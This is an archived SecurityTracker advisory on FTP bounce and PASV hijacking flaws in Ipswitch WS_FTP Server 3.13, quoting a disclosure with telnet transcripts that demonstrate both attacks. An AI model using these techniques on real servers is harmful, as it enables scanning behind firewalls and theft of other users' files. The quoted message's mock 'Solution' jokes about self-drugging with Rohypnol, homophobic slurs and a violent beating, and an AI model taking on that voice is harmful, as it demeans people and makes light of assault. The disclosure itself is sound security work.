SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (File Transfer/Sharing)  >   WS_FTP Vendors:   Ipswitch
Ipswitch WS_FTP Server Allows Remote Users to Hijack Connections And Conduct Bounce Attacks Via the FTP Server
SecurityTracker Alert ID:  1005486
SecurityTracker URL:  http://securitytracker.com/id/1005486
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Oct 25 2002
Impact:   Host/resource access via network, User access via network
Exploit Included:  Yes  
Version(s): 3.13
Description:   Two vulnerabilities were reported in the Ipswitch WS_FTP server. A remote user may be able to hijack valid FTP connections. A remote user can also attack other hosts via the FTP server.

It is reported that a remote user can attempt to hijack FTP sessions when FTP PASV mode is used. Normally, when a remote client requests an FTP PASV connection, the FTP server will assign a specific port number to the client. If the remote user can access the assigned port number before the remote client, the remote user can then hijack the connection.

A remote user can also employ an "FTP bounce attack" to cause the FTP server to create a connection to any IP address on any TCP port greater than 1024. If the target FTP server is located behind a firewall, for example, the remote user may be able to gain access to ostensibly protected hosts.

This bounce attack method has been well known for many years and is discussed in a CERT advisory from December 1997:

http://www.cert.org/advisories/CA-1997-27.html

Some demonstration exploit transcripts are provided in the Source Message.

The vendor has reportedly been notified.

Impact:   A remote user can make connections to arbitrary hosts via the FTP server. This can be used to attack hosts located behind firewalls.

A remote user can hijack PASV FTP connections, gaining access to directory listings and files from other users.

Solution:   No solution was available at the time of this entry.
Vendor URL:  www.ipswitch.com/support/WS_FTP-Server/patch-upgrades.html (Links to External Site)
Cause:   Access control error, State error
Underlying OS:  Windows (NT), Windows (2000), Windows (XP)

Message History:   None.


 Source Message Contents

Subject:  [VulnWatch] IPSwitch, Inc. WS_FTP Server


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1



Product:   IPSwitch, Inc. WS_FTP Server
Versions:  v3.13 (dated 2002.08.07), possibly others.
Severity:  Medium-Hot


Author:    low halo <lowhalo@hushmail.com>
Date:      October 25th, 2002
Revision:  1.0




{ Overview }

    WS_FTP v3.13 by IPSwitch, Inc., is vulnerable to the classic FTP bounce
attack as well as PASV connection hijacking.



{ Impact }

    The FTP bounce vulnerability allows a remote attacker to cause the FTP
server to create a connection to any IP address on any TCP port greater than
1024.  Thus, the attacker can scan Internet addresses anonymously along with
any internal addresses that the FTP server has access to.  More information
on this vulnerability can be found here:
        http://www.cert.org/advisories/CA-1997-27.html.
    The PASV connection hijacking vulnerability allows a remote attacker to
intercept directory listings and file downloads from other users; file uploads
may also be spoofed.  No authentication is necessary to execute this attack.
More information on this vulnerability can be found here:
        http://www.kb.cert.org/vuls/id/2558.



{ Details }

    This demonstrates the FTP bounce vulnerability.  The internal IP address,
"192.168.1.20", is listening on port 8080, and "192.168.2.30" is dead or not
accessible via port 8080:

$ telnet x.ternal.ip.address 21
Trying x.ternal.ip.address...
Connected to x.ternal.ip.address.
Escape character is '^]'.
220-lh1 X2 WS_FTP Server 3.1.3.EVAL (696969696)
220-Sun Jun 04 00:00:00 1989
220-27 days remaining on evaluation.
220 lh1 X2 WS_FTP Server 3.1.3.EVAL (969696969)
USER lowhalo
331 Password required
PASS el_ach
230 user logged in
PORT 192,168,1,20,31,144
200 command successful
LIST
150 Opening ASCII data connection for directory listing
226 transfer complete
PORT 192,168,2,30,31,144
200 command successful
LIST
425 Can't open data connection.


This demonstrates the PASV connection hijacking vulnerability:

$ telnet x.x.x.x 21
Trying x.x.x.x...
Connected to x.x.x.x.
Escape character is '^]'.
220-lh1 X2 WS_FTP Server 3.1.3.EVAL (696969696)
220-Sun Jun 04 00:00:00 1989
220-27 days remaining on evaluation.
220 lh1 X2 WS_FTP Server 3.1.3.EVAL (969696969)
USER lowhalo
331 Password required
PASS el_ach
230 user logged in
PASV
227 Entering Passive Mode (192,168,1,1,4,23).
LIST
150 Opening ASCII data connection for directory listing


Next, from another IP address:

$ telnet x.x.x.x 1047
Trying x.x.x.x...
Connected to x.x.x.x.
Escape character is '^]'.
drwxr-x---  2 lowhalo     System            0 Jan  0 00:00 .
drwxr-x---  2 lowhalo     System            0 Jan  0 00:00 ..
- -rwxr-x---  1 lowhalo     System         1337 Jan  0 00:00 lh
Connection closed by foreign host.



{ Solution }

    1.)  Mix yourself a Long Island Iced Tea.
    2.)  Buy more Rohypnol from Paco on 7th & 30th ('cuz you used up the
          box you bought last time to get yourself out of that chicken-
          suit bind last Wednesday, remember??).
    3.)  While you're not looking, slip yourself two (2) crushed 100mg pills.
    4.)  Drink your Long Island while pretending to be flirting with someone
          in a bar environment (but in fact, you're still in your lonely,
          lonely apartment because you're a fucking looser and you're gonna
          die alone 28 years from now).
    5.)  Put on those crotchless leather pants that you got in your closet.
          But this time, don't wear anything underneath.  Not even
          underwear.
    6.)  Go to the local gay bar, even though you're not gay, and wait
          outside 'till that warm fuzzy roofies feeling starts crawling up
          your back.
    7.)  Go inside the bar and look for the menacing black biker guy named
          Steve (Hey, how did you know his name is Steve if you're not
          gay, huh??).  Take the deepest breath you can and scream at the
          top of your lungs every homosexual slur that you can think of
          right in the guy's face.
    8.)  Wake up 16 hours later at the bottom of a ditch in a pool of your
          own blood with that, "uh-oh, I think I forgot my jacket at the
          bar" feeling.
    9.)  Try to figure out exactly what happened, and LAUGH YOUR ASS OFF
          when you do.
    10.) Die alone 28 years from now, you fucking looser.


    (Yeah, so anyways, IPSwitch never got back to me after two weeks, so
    there is no solution to this problem.)


{ Conclusion }

    A big huge shout-out goes to HACKTIVISMO (http://www.hacktivismo.com/)!!
You guys have a lot to be proud of.

    And here's a quote I'd like all those iDEFENSE research contributors to
read:

        "Few men have the virtue to withstand the highest bidder."
            - George Washington




        low halo <lowhalo@hushmail.com>
        Defender of Truth and Liberty

        http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x9BFD99BF
        58CE 3215 226A 69ED 4D20  4044 C925 54F9 9BFD 99BF


-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.0 (GNU/Linux)

iD8DBQE9uF67ySVU+Zv9mb8RAplZAJ0WhQbCfyjFWyNc8hfgIySKqFspBACeLFHb
8LkuAxTfsHywHMYA7SlCL8M=
=G5ln
-----END PGP SIGNATURE-----


--
This message has been sent via an anonymous mail relay at www.no-id.com.



 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC